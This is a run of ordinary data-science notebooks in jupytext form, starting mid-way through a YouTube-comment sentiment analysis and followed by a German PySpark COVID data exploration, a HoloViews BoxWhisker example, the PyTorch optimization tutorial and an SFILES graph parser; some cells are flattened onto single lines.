# BUG FIX: the loop removes from and appends to `cleaned` while iterating it,
# which makes Python silently skip elements; iterate over a snapshot instead.
for phrase in cleaned[:]:
    match = list()
    temp = list()
    word_match = list()
    for word in phrase.split():
        # Find common words among all phrases
        word_match = [p for p in cleaned if re.search(word, p) and p not in word_match]
        # If the size of matched phrases set is smaller than 30% of the cleaned phrases,
        # then consider the phrase as non-redundant.
        if len(word_match) <= len(cleaned)*0.3 :
            temp.append(word)
            match += word_match
    # NOTE(review): this rebinding only affects the debug print below — it does
    # not replace the phrase inside `cleaned`; confirm that was intended.
    phrase = ' '.join(temp)
    # print("Match for " + phrase + ": " + str(match))
    if len(match) >= len(cleaned)*0.1 :
        # Redundant feature set, since it contains more than 10% of the number of phrases.
        # Prune all matched features.
        for feature in match:
            if feature in cleaned:
                cleaned.remove(feature)
        # Add largest length phrase as feature
        cleaned.append(max(match, key=len))

print("After redundancy pruning:\nFeature Size:" + str(len(cleaned)))
print("Cleaned features:")
cleaned

# + [markdown] deletable=true editable=true
# We now find the noun phrases with maximum frequencies and select the "frequent feature set" using a certain cutoff.

# + deletable=true editable=true
from nltk.corpus import stopwords

feature_count = dict()
for phrase in cleaned:
    count = 0
    for word in phrase.split():
        if word not in stopwords.words('english'):
            count += comments.words.count(word)
    print(phrase + ": " + str(count))
    feature_count[phrase] = count

# + deletable=true editable=true
# Select frequent feature threshold as (max_count)/100
# This is an arbitrary decision as of now.
counts = list(feature_count.values())
features = list(feature_count.keys())
threshold = len(comments.noun_phrases)/100

print("Threshold:" + str(threshold))

frequent_features = list()
for feature, count in feature_count.items():
    if count >= threshold:
        frequent_features.append(feature)
print('Frequent Features:')
frequent_features

# + deletable=true editable=true
# Let's plot these feature occurrences and draw the threshold line
sns.set()
sns.set_context("poster")
f, ax = plt.subplots(figsize=(10, 50))
sns.swarmplot(y=features, x=counts, color="c", ax=ax)
plt.plot([threshold, threshold], [0, len(features)], linewidth=4, color="r")

# + [markdown] deletable=true editable=true
# ## Feature Specific Sentiment Analysis
# Now that we have the frequent features, we scan through the comments and find the sentences that contain these features. We then run sentiment analysis on these 'feature specific' sentences to get somewhat crude feature based sentiment scores. Further refinement will include generalizing the features, for e.g: "wonderful python library" could be generalized to "software", which will eventually lead to aspect wise sentiment scores.

# + deletable=true editable=true
absa_list = dict()
# For each frequent feature
for f in frequent_features:
    # For each comment
    absa_list[f] = list()
    for comment in result:
        blob = TextBlob(comment)
        # For each sentence of the comment
        for sentence in blob.sentences:
            # Search for frequent feature 'f'
            q = '|'.join(f.split())
            if re.search(r'\w*(' + str(q) + ')\w*', str(sentence)):
                absa_list[f].append(sentence)

# print("Aspect Specific sentences:")
# absa_list

# + [markdown] deletable=true editable=true
# ## Aspect based sentiment scoring
# Now that we have aspect specific sentences, all we have to do is run sentiment analysis on each sentence using TextBlob's sentiment analyzer.
#

# + deletable=true editable=true
scores = list()
absa_scores = dict()
for k, v in absa_list.items():
    absa_scores[k] = list()
    for sent in v:
        score = sent.sentiment.polarity
        scores.append(score)
        absa_scores[k].append(score)

# + deletable=true editable=true
# Now that we have all the scores, let's plot them!
# For comparison, we replot the previous global sentiment polarity plot
fig, (ax1, ax2) = plt.subplots(ncols=2, sharey=True, figsize=(20, 10))
plot1 = sns.distplot(scores, ax=ax1)
ax1.set_title('Aspect wise scores')
ax1.set_xlabel('Sentiment Polarity')
ax1.set_ylabel('# of comments')
ax2.set_title('Comment wise scores')
ax2.set_xlabel('Sentiment Polarity')
ax2.set_ylabel('# of comments')
plot2 = sns.distplot(sentiment_scores, ax=ax2)

# + [markdown] deletable=true editable=true
# ## Graph Analysis
# Notice the high amount of variance in the aspect based scores on the left. Even though a majority of the scores are neutral, there is lot of variance in the number of comments with positive sentiments. The total number of scores have also increased since one sentence of a comment may contain multiple frequent features.
#
# Now let's plot the scores grouped by aspects.
#

# + deletable=true editable=true
# Create data values for stripplot and boxplot
vals = dict()
vals["aspects"] = list()
vals["scores"] = list()
for k, v in absa_scores.items():
    for score in v:
        vals["aspects"].append(k)
        vals["scores"].append(score)

# + deletable=true editable=true
fig, ax1 = plt.subplots(figsize=(30, 10))
color = sns.color_palette("Blues", 6)
plt.xticks(rotation=90)
sns.set_context("paper", font_scale=3)
sns.boxplot(x="aspects", y="scores", data=vals, palette=color, ax=ax1)

# + [markdown] deletable=true editable=true
# Now we see the real strength of Aspect Based Sentiment Analysis. The box plots show a large amount of variance among sentiments across a variety of aspects. Keep in mind though, the aspects have been chosen based on frequency of noun phrases, so some of the phrases may not make sense (I am looking at you, "baby activation functionstrack").
#
# Nevertheless, this goes to show that carrying out sentiment analysis on aspects provides much more information than normal sentiment analysis. Also, we take a naive approach of picking the largest noun phrase as the aspect, which may not be the best assumption for all cases. For e.g, an aspect "project" would be better than "twitter sentiment analysis project", which works against my assumption.

# + deletable=true editable=true
color = sns.color_palette("Reds", 6)
fig, ax1 = plt.subplots(figsize=(30, 10))
plt.xticks(rotation=90)
sns.set_context("paper", font_scale=2)
sns.stripplot(x="aspects", y="scores",data=vals, palette=color)

# + [markdown] deletable=true editable=true
# # Conclusion
# I ran Aspect Based Sentiment Analysis (ABSA) on a YouTube [video](https://www.youtube.com/watch?v=si8zZHkufRY) and found that ABSA actually gives a more in-depth understanding of people's reviews.
#
# The sentiment scores have a large variance as compared to 'global' sentiment analysis. There are a lot of assumptions in the algorithms, but I hope the process proves the point that analyzing reviews/comments and scoring them as per the aspects that the reviewers talk about is more beneficial for the creator than conventional Sentiment Analysis.
#
# I hope this notebook has been informative and useful. If you are interested in Aspect Based Sentiment Analysis, you can check out [this](http://www.aclweb.org/anthology/S15-2082) paper. You can also check out the [SemEval](http://alt.qcri.org/semeval2016/task5/) task for Aspect Based Sentiment Analysis.
ABSA of YouTube Comments.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# # Data Understanding

# ## Setup

# +
# Python ≥3.5 is required
import sys
assert sys.version_info >= (3, 5)

# Scikit-Learn ≥0.20 is required
import sklearn
assert sklearn.__version__ >= "0.20"

# Common imports
import numpy as np
import os

# Imports for Correlation, Summarizer and ChiSquareTest
from pyspark.ml.stat import Correlation
from pyspark.ml.feature import VectorAssembler
from pyspark.sql import SparkSession
from pyspark.ml.stat import ChiSquareTest
from pyspark.ml.stat import Summarizer
from pandas.plotting import parallel_coordinates
import pandas as pd

# To plot pretty figures
# %matplotlib inline
import matplotlib as mpl
import matplotlib.pyplot as plt
mpl.rc('axes', labelsize=14)
mpl.rc('xtick', labelsize=12)
mpl.rc('ytick', labelsize=12)

# Where to save the figures
PROJECT_ROOT_DIR = "."
CHAPTER_ID = "end_to_end_project"
IMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, "images", CHAPTER_ID)
os.makedirs(IMAGES_PATH, exist_ok=True)


def save_fig(fig_id, tight_layout=True, fig_extension="png", resolution=300):
    """Save the current matplotlib figure as IMAGES_PATH/<fig_id>.<fig_extension>.

    NOTE: figures saved under the same fig_id overwrite each other, so every
    chart in this notebook should use a unique fig_id.
    """
    path = os.path.join(IMAGES_PATH, fig_id + "." + fig_extension)
    print("Saving figure", fig_id)
    if tight_layout:
        plt.tight_layout()
    plt.savefig(path, format=fig_extension, dpi=resolution)


# for pretty printing
def printDf(sprkDF):
    """Render a (small) Spark DataFrame as an HTML table for notebook display.

    Collects the whole frame to the driver via toPandas() — only use on
    summaries / small results.
    """
    newdf = sprkDF.toPandas()
    from IPython.display import display, HTML
    return HTML(newdf.to_html())


# Ignore useless warnings (see SciPy issue #5998)
import warnings
warnings.filterwarnings(action="ignore", message="^internal gelsd")

# Spark libs
from pyspark.sql.session import SparkSession

# helper functions
from helpers.helper_functions import translate_to_file_string

# (The duplicate printDf definition that used to follow here was removed —
# it silently shadowed the identical definition above.)

inputFile = translate_to_file_string("./data/Data_Preparation_Result.csv")
# -

# ## Create Spark Session

# create a SparkSession
spark = (SparkSession
         .builder
         .appName("RKIDATAUNDERSTANDING")
         .getOrCreate())

# create a DataFrame using an inferred schema
df = spark.read.option("header", "true") \
    .option("inferSchema", "true") \
    .option("delimiter", ";") \
    .csv(inputFile)
# printSchema() prints directly and returns None, so wrapping it in print()
# produced a spurious trailing "None".
df.printSchema()

df.count()

# ## Lagemaße

printDf(df.summary())

# ## Balkendiagramme
# An dieser Stelle wurde bewusst darauf verzichtet Histogramme zu verwenden, da vor allem Qualitative Merkmale (z.B. Bundesland - Nominal, Geschlecht - Nominal, Altersgruppe - Ordinal, ...) vorliegen. Stattdessen wurde auf Bar-Charts zurückgegriffen.
# Hinweis: Der Fallstatus nicht eingetreten bedeutet, dass die Person aktuell noch erkrankt ist.

# ### Initialisierung

# Init
# %matplotlib inline
import matplotlib.pyplot as plt

# ### Balkendiagram Bundesland
# Nachfolgend soll ein Balkendiagramm der aktuellen Coronazahlen, nach dem Fallstatus je Bundesland erstellt werden. Dies soll Auskunft über die Verteilung der Fälle nach Bundesland geben.
# Prepare the DataFrame: group by Bundesland and pivot on FallStatus
dfBundeslandGrouped = df.groupBy("Bundesland").pivot("FallStatus").count().orderBy("GENESEN", "GESTORBEN", "NICHTEINGETRETEN", ascending=False)
dfPandasBundesland = dfBundeslandGrouped.toPandas()
dfBundeslandGrouped.show()

# Create the stacked bar chart (one bar per Bundesland, stacked by FallStatus)
ax = dfPandasBundesland.plot.bar(x='Bundesland', ylabel="Anzahl Fälle", width=0.8, title="Fallzahlen nach Status je Bundesland", figsize=(20, 8), rot=90, stacked=True)
# BUG FIX: each chart previously used save_fig("attribute_bar_plots"), so every
# later chart overwrote this file; use a unique name per figure.
save_fig("bar_fallstatus_bundesland")
plt.show()

# ### Balkendiagram Geschlecht
# Nachfolgend soll ein Balkendiagramm der aktuellen Coronazahlen nach dem Fallstatus je Geschlecht erstellt werden. Dies soll Auskunft über die Verteilung der Fälle nach Geschlecht geben.

# Prepare the DataFrame: group by Geschlecht and pivot on FallStatus
dfGeschlechtGrouped = df.groupBy("Geschlecht").pivot("FallStatus").count().orderBy("GENESEN", "GESTORBEN", "NICHTEINGETRETEN", ascending=False)
dfPandasGeschlecht = dfGeschlechtGrouped.toPandas()
dfGeschlechtGrouped.show()

# Create the stacked bar chart (one bar per Geschlecht, stacked by FallStatus)
ax = dfPandasGeschlecht.plot.bar(x='Geschlecht', ylabel="Anzahl Fälle", width=0.5, title="Fallzahlen nach Status je Geschlecht", figsize=(15, 10), rot=90, stacked=True)
# Don't want scaled axis. Have a look at https://stackoverflow.com/questions/14711655/how-to-prevent-numbers-being-changed-to-exponential-form-in-python-matplotlib-fi
ax.get_yaxis().get_major_formatter().set_scientific(False)
save_fig("bar_fallstatus_geschlecht")  # unique name, see note above
plt.show()

# Dem Diagramm ist zu entnehmen, dass es mehr Genese bzw. insgesamt mehr an Corona erkrankte Menschen weiblichen Geschlechts gibt. Es liegt die Vermutung nahe, dass dies an der allgemein höheren Lebenserwartung von Frauen liegt, weshalb in hohen Altersgruppen auch mehr Frauen vertreten sind (bpb - Bundeszentrale für politische Bildung 2018).
#
# ### Balkendiagram Altersgruppe
# Nachfolgend soll ein Balkendiagramm der aktuellen Coronazahlen, nach dem Fallstatus je Altersgruppe erstellt werden. Dies soll Auskunft über die Verteilung der Fälle nach Altersgruppe geben.

# Prepare the DataFrame: group by Altersgruppe and pivot on FallStatus
dfAltersgruppeGrouped = df.groupBy("Altersgruppe").pivot("FallStatus").count().orderBy("GENESEN", "GESTORBEN", "NICHTEINGETRETEN", ascending=False)
dfAltersgruppePandas = dfAltersgruppeGrouped.toPandas()
dfAltersgruppeGrouped.show()

# Create the stacked bar chart (one bar per Altersgruppe, stacked by FallStatus)
ax = dfAltersgruppePandas.plot.bar(x='Altersgruppe', ylabel="Anzahl Fälle", width=0.5, title="Fallzahlen nach Status je Altersgruppe", figsize=(15, 10), rot=90, stacked=True)
# Don't want scaled axis. Have a look at https://stackoverflow.com/questions/14711655/how-to-prevent-numbers-being-changed-to-exponential-form-in-python-matplotlib-fi
ax.get_yaxis().get_major_formatter().set_scientific(False)
# BUG FIX: previously save_fig("attribute_bar_plots") — all charts in this
# notebook overwrote the same image file; use a unique name per figure.
save_fig("bar_fallstatus_altersgruppe")
plt.show()

# ### Verstorben nach Altersgruppe und Geschlecht

# Restrict to deceased cases, then group by Altersgruppe and pivot on Geschlecht
dfVerstorbenGrouped = df.filter(df.FallStatus == "GESTORBEN").groupBy("Altersgruppe").pivot("Geschlecht").count().orderBy("W", "M", ascending=True)
dfVerstorbenPandas = dfVerstorbenGrouped.toPandas()
dfVerstorbenGrouped.show()

# Create the bar chart (deaths per age group, split by sex)
ax = dfVerstorbenPandas.plot.bar(x='Altersgruppe', ylabel="Anzahl Verstorbene", width=0.5, title="Verstorbene nach Alter und Geschlecht", figsize=(15, 10), rot=90)
# Don't want scaled axis. Have a look at https://stackoverflow.com/questions/14711655/how-to-prevent-numbers-being-changed-to-exponential-form-in-python-matplotlib-fi
ax.get_yaxis().get_major_formatter().set_scientific(False)
save_fig("bar_verstorbene_alter_geschlecht")  # unique name, see note above
plt.show()

# ## Korrelationsanalyse

# +
# Build the feature vector from the indexed categorical columns
assembler = VectorAssembler(outputCol="features", inputCols=["FallStatusIndex", "GeschlechtIndex", "AltersgruppeIndex", "BundeslandIndex", "LandkreisIndex"])
featureVector = assembler.transform(df)


def prettyPrintDenseMatrix(dm, collArray):
    """Render a Spark DenseMatrix as an HTML table with the given column labels."""
    rows = dm.toArray().tolist()
    dfDM = spark.createDataFrame(rows, collArray)
    newDf = dfDM.toPandas()
    from IPython.display import display, HTML
    return HTML(newDf.to_html())
# -

# Die nachfolgenden Korrelationsanalysen weisen auf, dass die Features 'Alter' und 'Fallstatus' im Vergleich zu den anderen Merkmalen (ausgenommen Landkreis und Bundesland) den größten Zusammenhang besitzen, auch wenn die Korrelation nicht sehr ausgeprägt (signifikant) ist. Jedoch kann mit Blick auf die anderen Auswertungen, gesagt werden, dass ca. 20.63% aller Über 80 Jährigen die an Corona erkranken auch sterben. Bei den Erkrankten zwischen 60 und 79 sind es 4,9%. Zu diesen beiden Altersgruppen lassen sich ca. 95.7% aller Verstorbenen zuordnen.
# ### Korrelationsanalyse nach Pearson corPearson = Correlation.corr(featureVector, "features").head() print("Pearson correlation matrix:\n") prettyPrintDenseMatrix(corPearson[0], ["FallStatus", "Geschlecht", "Altersgruppe", "Bundesland", "Landkreis"]) # ### Korrelationsanalyse nach Spearman corSpearmen = Correlation.corr(featureVector, "features", "spearman").head() print("Spearman correlation matrix:\n") prettyPrintDenseMatrix(corSpearmen[0], ["FallStatus", "Geschlecht", "Altersgruppe", "Bundesland", "Landkreis"]) # ## Hypothesenüberprüfung # Aufbau des Feature-Vectors assembler = VectorAssembler(outputCol="features", inputCols=["GeschlechtIndex","AltersgruppeIndex","BundeslandIndex"]) featureVector = assembler.transform(df) # ### Chi Quadrad-Test # Bezüglich der Interpreation der Ergebniswerte, sei auf die hießigen Statistischen Werke verwiesen. ciSquare = ChiSquareTest.test(featureVector, "features", "FallStatusIndex") ciSquare.show(truncate=False) # ## Histogramm # ### Fallzahlen über den Zeitverlauf dfHist = df.select("Falldatum") dfHistPandas = dfHist.toPandas() dfHistPandas['Falldatum'] = pd.to_datetime(dfHistPandas['Falldatum']) hist = dfHistPandas.hist(bins=100, figsize=(15,10))
03_Data_Understanding_B.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
# ---

# <div class="contentcontainer med left" style="margin-left: -50px;">
# <dl class="dl-horizontal">
# <dt>Title</dt> <dd> BoxWhisker Element</dd>
# <dt>Dependencies</dt> <dd>Bokeh</dd>
# <dt>Backends</dt> <dd><a href='./BoxWhisker.ipynb'>Bokeh</a></dd> <dd><a href='../matplotlib/BoxWhisker.ipynb'>Matplotlib</a></dd>
# </dl>
# </div>

import numpy as np
import holoviews as hv
from holoviews import opts

hv.extension('bokeh')

# A ``BoxWhisker`` Element is a quick way of visually summarizing one or more groups of numerical data through their quartiles. The boxes of a ``BoxWhisker`` element represent the first, second and third quartiles. The whiskers follow the Tukey boxplot definition representing the lowest datum still within 1.5 IQR of the lower quartile, and the highest datum still within 1.5 IQR of the upper quartile. Any points falling outside this range are shown as distinct outlier points.
#
# The data of a ``BoxWhisker`` Element may have any number of key dimensions representing the grouping of the value dimension and a single value dimensions representing the distribution of values within each group. See the [Tabular Datasets](../../../user_guide/08-Tabular_Datasets.ipynb) user guide for supported data formats, which include arrays, pandas dataframes and dictionaries of arrays.

# With no key dimensions supplied, a BoxWhisker summarizes a single distribution:

single_dist = hv.BoxWhisker(np.random.randn(1000), vdims='Value')
single_dist

# By supplying key dimensions we can compare our distributions across multiple variables.

# Draw the three random columns in the same order as before, then assemble the
# element from the named intermediates rather than one inline tuple.
group_labels = [chr(ord('A') + g) for g in np.random.randint(0, 3, 200)]
category_values = np.random.randint(0, 5, 200)
measurements = np.random.randn(200)

grouped_box = hv.BoxWhisker(
    (group_labels, category_values, measurements),
    kdims=['Group', 'Category'],
    vdims='Value',
).sort()

grouped_box.opts(
    opts.BoxWhisker(box_color='white', height=400, show_legend=False,
                    whisker_color='gray', width=600))

# For full documentation and the available style and plot options, use ``hv.help(hv.BoxWhisker).``
examples/reference/elements/bokeh/BoxWhisker.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # %matplotlib inline # # `Learn the Basics <intro.html>`_ || # `Quickstart <quickstart_tutorial.html>`_ || # `Tensors <tensorqs_tutorial.html>`_ || # `Datasets & DataLoaders <data_tutorial.html>`_ || # `Transforms <transforms_tutorial.html>`_ || # `Build Model <buildmodel_tutorial.html>`_ || # `Autograd <autogradqs_tutorial.html>`_ || # **Optimization** || # `Save & Load Model <saveloadrun_tutorial.html>`_ # # Optimizing Model Parameters # =========================== # # Now that we have a model and data it's time to train, validate and test our model by optimizing its parameters on # our data. Training a model is an iterative process; in each iteration (called an *epoch*) the model makes a guess about the output, calculates # the error in its guess (*loss*), collects the derivatives of the error with respect to its parameters (as we saw in # the `previous section <autograd_tutorial.html>`_), and **optimizes** these parameters using gradient descent. For a more # detailed walkthrough of this process, check out this video on `backpropagation from 3Blue1Brown <https://www.youtube.com/watch?v=tIeHLnjs5U8>`__. # # Prerequisite Code # ----------------- # We load the code from the previous sections on `Datasets & DataLoaders <data_tutorial.html>`_ # and `Build Model <buildmodel_tutorial.html>`_. 
#
#

# +
import torch
from torch import nn
from torch.utils.data import DataLoader
from torchvision import datasets
from torchvision.transforms import ToTensor, Lambda

# FashionMNIST train/test splits, downloaded to ./data on first run
training_data = datasets.FashionMNIST(
    root="data",
    train=True,
    download=True,
    transform=ToTensor()
)

test_data = datasets.FashionMNIST(
    root="data",
    train=False,
    download=True,
    transform=ToTensor()
)

train_dataloader = DataLoader(training_data, batch_size=64)
test_dataloader = DataLoader(test_data, batch_size=64)


class NeuralNetwork(nn.Module):
    """Simple fully-connected classifier: 28x28 image -> 10 class logits."""

    def __init__(self):
        # Modernized from super(NeuralNetwork, self).__init__() — identical behavior.
        super().__init__()
        self.flatten = nn.Flatten()
        self.linear_relu_stack = nn.Sequential(
            nn.Linear(28*28, 512),
            nn.ReLU(),
            nn.Linear(512, 512),
            nn.ReLU(),
            nn.Linear(512, 10),
            nn.ReLU()
        )

    def forward(self, x):
        # Flatten (N, 1, 28, 28) images to (N, 784) before the linear stack
        x = self.flatten(x)
        logits = self.linear_relu_stack(x)
        return logits


model = NeuralNetwork()
# -

# Hyperparameters
# -----------------
#
# Hyperparameters are adjustable parameters that let you control the model optimization process.
# Different hyperparameter values can impact model training and convergence rates
# (`read more <https://pytorch.org/tutorials/beginner/hyperparameter_tuning_tutorial.html>`__ about hyperparameter tuning)
#
# We define the following hyperparameters for training:
#  - **Number of Epochs** - the number times to iterate over the dataset
#  - **Batch Size** - the number of data samples seen by the model in each epoch
#  - **Learning Rate** - how much to update models parameters at each batch/epoch. Smaller values yield slow learning speed, while large values may result in unpredictable behavior during training.
#
#

# NOTE(review): the DataLoaders above hard-code batch_size=64; keep this constant in sync.
learning_rate = 1e-3
batch_size = 64
epochs = 5

# Optimization Loop
# -----------------
#
# Once we set our hyperparameters, we can then train and optimize our model with an optimization loop. Each
# iteration of the optimization loop is called an **epoch**.
# # Each epoch consists of two main parts: # - **The Train Loop** - iterate over the training dataset and try to converge to optimal parameters. # - **The Validation/Test Loop** - iterate over the test dataset to check if model performance is improving. # # Let's briefly familiarize ourselves with some of the concepts used in the training loop. Jump ahead to # see the `full-impl-label` of the optimization loop. # # Loss Function # ~~~~~~~~~~~~~~~~~ # # When presented with some training data, our untrained network is likely not to give the correct # answer. **Loss function** measures the degree of dissimilarity of obtained result to the target value, # and it is the loss function that we want to minimize during training. To calculate the loss we make a # prediction using the inputs of our given data sample and compare it against the true data label value. # # Common loss functions include `nn.MSELoss <https://pytorch.org/docs/stable/generated/torch.nn.MSELoss.html#torch.nn.MSELoss>`_ (Mean Square Error) for regression tasks, and # `nn.NLLLoss <https://pytorch.org/docs/stable/generated/torch.nn.NLLLoss.html#torch.nn.NLLLoss>`_ (Negative Log Likelihood) for classification. # `nn.CrossEntropyLoss <https://pytorch.org/docs/stable/generated/torch.nn.CrossEntropyLoss.html#torch.nn.CrossEntropyLoss>`_ combines ``nn.LogSoftmax`` and ``nn.NLLLoss``. # # We pass our model's output logits to ``nn.CrossEntropyLoss``, which will normalize the logits and compute the prediction error. # # # Initialize the loss function loss_fn = nn.CrossEntropyLoss() # Optimizer # ~~~~~~~~~~~~~~~~~ # # Optimization is the process of adjusting model parameters to reduce model error in each training step. **Optimization algorithms** define how this process is performed (in this example we use Stochastic Gradient Descent). # All optimization logic is encapsulated in the ``optimizer`` object. 
Here, we use the SGD optimizer; additionally, there are many `different optimizers <https://pytorch.org/docs/stable/optim.html>`_
# available in PyTorch such as ADAM and RMSProp, that work better for different kinds of models and data.
#
# We initialize the optimizer by registering the model's parameters that need to be trained, and passing in the learning rate hyperparameter.
#
#

optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate)

# Inside the training loop, optimization happens in three steps:
#  * Call ``optimizer.zero_grad()`` to reset the gradients of model parameters. Gradients by default add up; to prevent double-counting, we explicitly zero them at each iteration.
#  * Backpropagate the prediction loss with a call to ``loss.backward()``. PyTorch deposits the gradients of the loss w.r.t. each parameter.
#  * Once we have our gradients, we call ``optimizer.step()`` to adjust the parameters by the gradients collected in the backward pass.
#
#
#

# Full Implementation
# -----------------------
# We define ``train_loop`` that loops over our optimization code, and ``test_loop`` that
# evaluates the model's performance against our test data.
#
#

# +
def train_loop(dataloader, model, loss_fn, optimizer):
    """Run one training epoch over `dataloader`, updating `model` in place."""
    size = len(dataloader.dataset)
    model.train()  # ensure training-mode behavior (dropout/batch-norm, if present)
    for batch, (X, y) in enumerate(dataloader):
        # Compute prediction and loss
        pred = model(X)
        loss = loss_fn(pred, y)

        # Backpropagation
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()

        if batch % 100 == 0:
            loss, current = loss.item(), batch * len(X)
            print(f"loss: {loss:>7f}  [{current:>5d}/{size:>5d}]")


def test_loop(dataloader, model, loss_fn):
    """Evaluate `model` on `dataloader`, printing accuracy and average loss."""
    size = len(dataloader.dataset)   # number of samples (denominator for accuracy)
    num_batches = len(dataloader)    # number of batches (denominator for avg loss)
    model.eval()  # evaluation-mode behavior (dropout/batch-norm, if present)
    test_loss, correct = 0, 0

    with torch.no_grad():
        for X, y in dataloader:
            pred = model(X)
            test_loss += loss_fn(pred, y).item()
            correct += (pred.argmax(1) == y).type(torch.float).sum().item()

    # BUG FIX: loss_fn returns a per-batch *mean*, so the accumulated total must be
    # divided by the number of batches, not the dataset size (which understated the
    # average loss by roughly a factor of batch_size).
    test_loss /= num_batches
    correct /= size
    print(f"Test Error: \n Accuracy: {(100*correct):>0.1f}%, Avg loss: {test_loss:>8f} \n")
# -

# We initialize the loss function and optimizer, and pass it to ``train_loop`` and ``test_loop``.
# Feel free to increase the number of epochs to track the model's improving performance.
#
#

# +
loss_fn = nn.CrossEntropyLoss()
optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate)

epochs = 10
for t in range(epochs):
    print(f"Epoch {t+1}\n-------------------------------")
    train_loop(train_dataloader, model, loss_fn, optimizer)
    test_loop(test_dataloader, model, loss_fn)
print("Done!")
# -

# Further Reading
# -----------------------
# - `Loss Functions <https://pytorch.org/docs/stable/nn.html#loss-functions>`_
# - `torch.optim <https://pytorch.org/docs/stable/optim.html>`_
# - `Warmstart Training a Model <https://pytorch.org/tutorials/recipes/recipes/warmstarting_model_using_parameters_from_a_different_model.html>`_
#
#
#
jupyter/PyTorch tutorials/optimization_tutorial.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# + [markdown] colab_type="text" id="Do6-5IxXl7lE"
# # SFILES Directed Graph
#
# This notebook demonstrates the compilation of SFILES descriptors to a directed graph.

# + [markdown] colab_type="text" id="jx1vt_ANagX_"
# ## Parsing Rules
#
# The next cell develops a representation of the SFILES grammar using the `pyparsing` library. In this case, the `unit` match is not restricted to a specific list of unit operations. Instead, `unit` is any sequence of lower case alphabetic characters.

# + colab={} colab_type="code" id="JGpySfEcSaxs"
from pyparsing import Literal, Word, Group, Suppress
from pyparsing import Optional, OneOrMore, ZeroOrMore, oneOf, nestedExpr
from pyparsing import alphas, nums

# punctuation tokens (suppressed from the parse results except for connectors)
LPAR = Suppress("(")
RPAR = Suppress(")")
LBRA = Suppress("[")
RBRA = Suppress("]")
SLASH = Suppress("/")
GT = Literal(">")
LT = Literal("<")

# components: a single upper-case letter
component = Word(alphas.upper(), exact=1)

# mixtures: one or more components
mixture = Group(OneOrMore(component))

# first unit and stream in a process group
unit = Optional(Word(alphas.lower()), default='dist')
stream = Group(unit + mixture)

# subsequent units and streams in a process group
unit_ = Optional(Word(alphas.lower()), default='s')
stream_ = Group(unit_ + mixture)

# process group: (stream/stream/...)
processgroup = Group(LPAR + stream + ZeroOrMore(SLASH + stream_) + RPAR)

# a process group sequence is comprised of connectors, process groups, and recycles
connector = Optional(GT | LT, default=GT)
recycle = Word(nums, exact=1)
sequence = Group(processgroup + ZeroOrMore(connector + (processgroup | recycle)))

# nested branches: [ ... ]
branchsequence = OneOrMore(connector + (processgroup | recycle))
branch = nestedExpr(opener=LBRA, closer=RBRA, content=branchsequence)

# an sfiles expression starts with a sequence
sfiles = sequence + ZeroOrMore(branch | sequence)

# example
results = sfiles.parseString('(iA)(rAB/pABCD)<1<2[<(iB)](mABC/D)[<(oD)](A/BC)1(cycB/C)2(oC)')
results.asList()

# +
# Parse actions build the directed graph as a side effect of parsing:
# graph maps process-group label -> set of successor labels.
graph = {}
components = set()
units = set()
lastProcessgroup = ['']   # stack of "current" process groups (one entry per open branch)
lastConnector = ''        # most recently seen connector ('>' or '<')
recycleA = {}             # recycle id -> upstream process group (forward references)
recycleB = {}             # recycle id -> downstream process group (backward references)


def componentAction(t):
    """Record every component letter seen."""
    components.add(t[0])
    return t
component.setParseAction(componentAction)


def mixtureAction(t):
    """Collapse a mixture's components into a single string, e.g. ['A','B'] -> 'AB'."""
    return ''.join(t[0])
mixture.setParseAction(mixtureAction)


def unitAction(t):
    """Record every unit-operation name seen."""
    units.add(t[0])
    return t
unit.setParseAction(unitAction)


def streamAction(t):
    """Collapse a stream's unit + mixture into one string, e.g. ['i','A'] -> 'iA'."""
    return ''.join(t[0])
stream.setParseAction(streamAction)
stream_.setParseAction(streamAction)


def processgroupAction(t):
    """Register a process group as a graph node and link it to the previous group."""
    global lastConnector
    pg = '(' + '/'.join(t[0]) + ')'
    graph[pg] = set()
    if lastProcessgroup[-1] and ('>' in lastConnector):
        # forward connector: previous group feeds this one
        graph[lastProcessgroup[-1]].add(pg)
    # BUG FIX: this branch previously repeated the '>' test, making it unreachable;
    # a '<' connector means the edge points from this group back to the previous one.
    elif lastProcessgroup[-1] and ('<' in lastConnector):
        graph[pg].add(lastProcessgroup[-1])
    lastProcessgroup[-1] = pg
    return pg
processgroup.setParseAction(processgroupAction)


def connectorAction(t):
    """Remember the direction of the most recent connector."""
    global lastConnector
    lastConnector = str(t[0])
    return t
connector.setParseAction(connectorAction)


def recycleAction(t):
    """Match the two endpoints of a numbered recycle and add the edge."""
    global lastProcessgroup, lastConnector
    if '<' in lastConnector:
        if t[0] in recycleA.keys():
            src = recycleA[t[0]]
            dst = lastProcessgroup[-1]
            graph[src].add(dst)
        else:
            recycleB[t[0]] = lastProcessgroup[-1]
    else:
        if t[0] in recycleB.keys():
            src = lastProcessgroup[-1]
            dst = recycleB[t[0]]
            graph[src].add(dst)
        else:
            recycleA[t[0]] = lastProcessgroup[-1]
# BUG FIX: recycleAction was defined but never registered, so recycle edges were
# silently dropped; register it like every other parse action.
recycle.setParseAction(recycleAction)


def sequenceAction(t):
    """Push the sequence's last process group as the new branch context."""
    global lastProcessgroup
    lastProcessgroup.append(t[0][-1])
    return t
sequence.setParseAction(sequenceAction)
branchsequence.setParseAction(sequenceAction)


def branchAction(t):
    """Pop the branch context (and the sequence entry it pushed) when a branch closes."""
    global lastProcessgroup
    lastProcessgroup.pop(-1)
    lastProcessgroup.pop(-1)
    return t
branch.setParseAction(branchAction)


